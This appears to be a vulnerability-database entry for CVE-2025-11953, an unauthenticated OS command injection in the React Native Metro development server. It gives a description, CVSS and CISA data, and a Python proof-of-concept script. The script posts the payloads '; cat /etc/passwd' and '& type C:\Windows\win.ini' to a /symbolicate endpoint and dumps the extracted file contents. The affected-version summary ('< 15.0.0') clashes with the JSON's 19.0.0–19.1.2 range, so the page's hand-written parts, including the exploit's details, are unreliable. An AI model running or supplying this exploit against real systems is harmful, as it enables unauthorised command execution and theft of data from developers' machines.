Security Vulnerability Report
CVE-2025-11953 CVSS 9.8 CRITICAL

CVE-2025-11953

Published: 2025-11-03 17:15:33
Last Modified: 2026-02-06 19:43:48

Description

The Metro Development Server, which is opened by the React Native Community CLI, binds to external interfaces by default. The server exposes an endpoint that is vulnerable to OS command injection. This allows unauthenticated network attackers to send a POST request to the server and run arbitrary executables. On Windows, the attackers can also execute arbitrary shell commands with fully controlled arguments.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:react-native-community:react_native_community_cli:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:react-native-community:react_native_community_cli:18.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha2:*:*:*:*:*:* - VULNERABLE
React Native Community CLI < 15.0.0
Metro Development Server (all versions exposed to the network)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-11953 PoC - Metro Development Server Command Injection
# Target: React Native Community CLI Metro Server
# Severity: Critical (CVSS 9.8)

def exploit_metro_server(target_ip, target_port=8081):
    """
    Exploit for CVE-2025-11953: Metro Development Server Command Injection

    This PoC demonstrates how an unauthenticated attacker can execute
    arbitrary commands on systems running Metro dev server exposed to network.

    WARNING: For authorized security testing only!
    """
    # Check if server is reachable
    base_url = f"http://{target_ip}:{target_port}"
    try:
        response = requests.get(base_url, timeout=5)
        print(f"[*] Metro server is reachable at {base_url}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Cannot reach Metro server: {e}")
        return False

    # Command injection payload for Linux/macOS
    linux_payload = "; cat /etc/passwd"

    # Command injection payload for Windows
    windows_payload = "& type C:\\Windows\\win.ini"

    # Try Linux payload
    print(f"[*] Sending command injection payload...")
    try:
        response = requests.post(
            f"{base_url}/symbolicate",
            json={"stack": [{"file": linux_payload}]},
            timeout=10
        )
        print(f"[*] Response status: {response.status_code}")
        if "root:" in response.text or "daemon:" in response.text:
            print("[+] VULNERABLE! Command injection successful!")
            print(f"[*] Extracted /etc/passwd content:")
            print(response.text[:500])
            return True
    except Exception as e:
        print(f"[!] Error: {e}")

    # Try Windows payload
    try:
        response = requests.post(
            f"{base_url}/symbolicate",
            json={"stack": [{"file": windows_payload}]},
            timeout=10
        )
        if "for 16-bit app support" in response.text.lower():
            print("[+] VULNERABLE! Windows command injection successful!")
            return True
    except:
        pass

    print("[-] Target may not be vulnerable or different endpoint required")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-11953-poc.py <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8081
    exploit_metro_server(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11953", "sourceIdentifier": "[email protected]", "published": "2025-11-03T17:15:32.677", "lastModified": "2026-02-06T19:43:47.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Metro Development Server, which is opened by the React Native Community CLI, binds to external interfaces by default. The server exposes an endpoint that is vulnerable to OS command injection. This allows unauthenticated network attackers to send a POST request to the server and run arbitrary executables. On Windows, the attackers can also execute arbitrary shell commands with fully controlled arguments."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2026-02-05", "cisaActionDue": "2026-02-26", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "React Native Community CLI OS Command Injection Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:react-native-community:react_native_community_cli:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.0.0", "versionEndExcluding": "19.1.2", "matchCriteriaId": "99E1FC34-6FDB-45F5-841F-F96C5012DC5C"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:react-native-community:react_native_community_cli:18.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "2C0FCA50-3DE2-4CD3-87AB-EA793072E856"}, {"vulnerable": true, "criteria": "cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha0:*:*:*:*:*:*", "matchCriteriaId": "681E0D24-769A-4A3C-B19A-B260114B7291"}, {"vulnerable": true, "criteria": "cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "D3BBB26F-FAB1-49BB-A7EE-E9FDF0797B01"}, {"vulnerable": true, "criteria": "cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "84D809F4-D4FF-44F4-857F-294D208F5C9E"}]}]}], "references": [{"url": "https://github.com/react-native-community/cli/commit/15089907d1f1301b22c72d7f68846a2ef20df547", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://jfrog.com/blog/cve-2025-11953-critical-react-native-community-cli-vulnerability", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://x.com/SzymonRybczak/status/1986199665000566848", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}, {"url": "https://x.com/thymikee/status/1986770875954475375", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-11953", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}, {"url": "https://www.vulncheck.com/blog/metro4shell_eitw", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}